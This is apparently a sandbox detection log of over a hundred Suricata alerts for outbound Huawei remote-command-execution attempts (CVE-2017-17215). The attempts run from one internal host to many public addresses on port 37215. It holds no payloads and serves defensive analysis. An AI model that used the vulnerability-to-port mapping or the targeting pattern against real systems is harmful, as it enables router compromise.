              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36690 -> 197.149.86.15:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34354 -> 156.118.15.77:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39664 -> 197.100.95.27:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44080 -> 197.45.238.77:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45840 -> 197.54.244.55:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51316 -> 197.70.21.170:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33814 -> 197.115.20.97:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38070 -> 156.192.23.228:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52286 -> 197.26.1.10:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55234 -> 156.94.213.184:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51502 -> 156.66.17.48:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40262 -> 156.82.20.90:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53300 -> 156.94.60.223:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59162 -> 197.145.224.244:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48154 -> 156.184.138.18:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33914 -> 197.209.91.38:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50762 -> 197.162.83.164:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47822 -> 197.243.207.192:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60696 -> 197.249.27.124:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57816 -> 197.168.196.226:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50096 -> 197.136.26.223:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42478 -> 156.116.126.121:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60652 -> 197.115.194.47:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35518 -> 197.255.240.118:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36432 -> 197.247.51.24:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55344 -> 156.220.51.240:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57438 -> 156.181.229.36:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55290 -> 197.33.1.109:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58720 -> 197.30.158.66:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35326 -> 156.196.232.255:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38130 -> 197.60.232.77:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48840 -> 156.180.29.130:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43766 -> 156.213.144.79:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47680 -> 197.246.45.135:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46970 -> 197.42.120.198:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33202 -> 156.195.107.125:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59558 -> 156.182.190.148:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45132 -> 197.139.158.16:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59016 -> 156.105.77.137:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47880 -> 156.74.148.102:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34436 -> 156.38.238.240:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59592 -> 156.83.8.136:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:32912 -> 156.8.111.215:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36020 -> 197.166.87.127:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51358 -> 197.186.156.129:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44348 -> 197.234.213.217:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36080 -> 197.21.250.108:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56222 -> 197.19.112.136:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33942 -> 156.169.53.51:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34616 -> 156.45.57.117:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53760 -> 197.30.246.255:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41480 -> 156.129.23.232:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43626 -> 156.217.229.222:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34570 -> 156.36.147.115:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38318 -> 156.139.181.110:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60804 -> 156.126.46.215:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37020 -> 156.155.141.93:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50712 -> 197.55.254.15:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34428 -> 197.200.24.67:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42024 -> 156.220.126.67:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54056 -> 197.215.206.157:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57694 -> 156.236.29.28:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52050 -> 156.118.188.7:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52120 -> 197.152.221.23:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35286 -> 197.98.85.158:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54298 -> 156.164.199.56:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58530 -> 197.244.57.216:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37294 -> 197.146.1.174:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58300 -> 197.247.235.84:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46112 -> 197.241.124.234:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37706 -> 197.165.14.106:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38740 -> 197.246.76.134:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56570 -> 197.22.57.79:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42476 -> 197.144.44.5:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57996 -> 197.222.229.126:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59782 -> 197.67.48.173:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39654 -> 197.52.206.119:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42938 -> 197.22.43.180:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49780 -> 197.55.241.50:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51862 -> 197.216.142.84:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57688 -> 197.8.234.119:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45616 -> 197.176.129.217:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42316 -> 197.1.20.220:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49066 -> 197.90.20.177:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47098 -> 197.165.217.176:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36078 -> 156.14.75.201:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47784 -> 197.30.21.223:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38410 -> 197.158.158.85:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44390 -> 197.20.244.22:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46816 -> 156.162.226.202:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49222 -> 197.101.195.37:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48348 -> 197.186.52.129:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36904 -> 156.114.202.11:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59800 -> 156.67.247.26:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60774 -> 156.60.155.253:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45246 -> 197.185.94.38:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41148 -> 156.45.246.189:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34472 -> 197.29.94.164:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36364 -> 197.17.45.143:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60990 -> 197.202.85.157:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60372 -> 156.197.2.7:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56140 -> 197.217.171.64:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51898 -> 156.232.215.205:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42016 -> 197.173.244.41:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36834 -> 156.147.252.153:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46528 -> 156.137.245.26:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48498 -> 197.171.250.170:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40394 -> 197.208.28.249:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34488 -> 197.136.3.156:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35640 -> 197.234.181.162:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53486 -> 156.166.229.152:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38582 -> 156.251.76.231:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57306 -> 197.93.150.131:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53160 -> 197.159.191.225:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33322 -> 156.240.112.131:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49782 -> 197.120.124.120:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36466 -> 197.145.154.208:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50498 -> 197.98.143.84:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38792 -> 156.191.168.26:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57670 -> 197.245.145.168:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52380 -> 197.187.66.131:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42324 -> 156.234.40.79:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54542 -> 156.60.168.12:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37194 -> 197.23.124.115:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48318 -> 197.108.145.95:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43452 -> 156.224.156.84:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52186 -> 197.192.26.157:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35602 -> 156.110.174.54:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58642 -> 197.190.36.103:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39986 -> 197.24.213.226:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38260 -> 197.135.111.251:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46124 -> 197.156.140.160:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36998 -> 197.226.83.75:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60720 -> 197.138.105.13:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34012 -> 197.191.209.114:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40954 -> 197.86.248.27:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55634 -> 197.163.152.107:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60858 -> 197.107.236.242:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40770 -> 197.125.193.42:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57994 -> 197.43.240.5:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59714 -> 197.80.183.166:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44578 -> 156.150.86.93:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60418 -> 197.13.146.90:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60924 -> 197.17.90.55:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45372 -> 197.188.80.129:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52856 -> 197.11.143.10:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51720 -> 156.223.241.35:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57002 -> 197.134.70.0:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36470 -> 197.1.183.35:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40548 -> 197.49.94.218:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59178 -> 156.44.73.95:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50362 -> 197.16.13.88:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35784 -> 197.168.70.44:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48250 -> 197.77.83.97:37215
